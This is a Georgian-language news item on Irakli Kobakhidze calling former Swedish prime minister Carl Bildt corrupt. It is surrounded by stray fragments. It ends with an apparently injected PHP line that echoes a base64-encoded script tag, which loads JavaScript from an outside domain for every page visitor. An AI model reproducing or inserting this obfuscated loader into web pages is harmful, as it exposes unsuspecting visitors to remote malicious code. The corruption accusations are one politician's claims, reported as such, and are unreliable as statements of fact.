celsiusi
ავერსი შნაიდერი

"ქართული ოცნების" თავმჯდომარის, ირაკლი კობახიძის განცხადებით, შვედეთის ყოფილი პრემიერმინისტრი, კარლ ბილდტი ჩვეულებრივი კორუმპირებული კაცია.

კობახიძის განცხადებით, კორუმპირებული კაცი როდესაც სამარცხვინო რაღაცეებს წერს მას პასუხი უნდა გაეცეს. 

მისივე თქმით, კორუმპირებული ხალხი საშიშია და ბილდტიც იყო საფრთხე ჩვენი ქვეყნისთვის.

"კარლ ბილდტი აიჭრა იმიტომ, რომ ღარიბაშვილმა ზუსტად მიზანში მოარტყა, ეს არის ჩვეულებრივი კორუმპირებული კაცი. რაც დადასტურებულია დოკუმენტურად, ჩვეულები კორუმპირებული კაცია, რომელიც იყო ნაცმოძრაობის ერთ-ერთი მთავარი ლობისტი და ქვეყნის დაზიანებაზე აკეთა ფული წლების განმავლობაში. ნაცმოძრაობა როდესაც ამყარებდა აქ სისხლიან რეჟიმს, აუპატიურებდა ადამიანებს და ა.შ. მაშინ ფულის სანაცვლოდ კარლ ბილდტი ლობირებდა ნაცმოძრაობის სისხლიან რეჟიმს", - თქვაირაკლიკობახიძემ

შეგახსენებთ, რომ ღარიბაშვილმა გუშინ პარლამენტში გამოსვლის დროს კარლ ბილდტზე თქვა, რომ მისი ცოლის კომპანიას საქართველოს ბიუჯეტიდან მილიონები აქვს წაღებული.  პოლიტიკოსი ღარიბაშვილის განცხადებას იმავე დღეს გამოეხმაურა და დაწერა, რომ პრემიერი რელსებიდანაა გადასული. მისვე თქმით, ღარიბაშვილი ტრაგედიაა ძალიან კარგი ქვეყნისთვის.

 

563
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");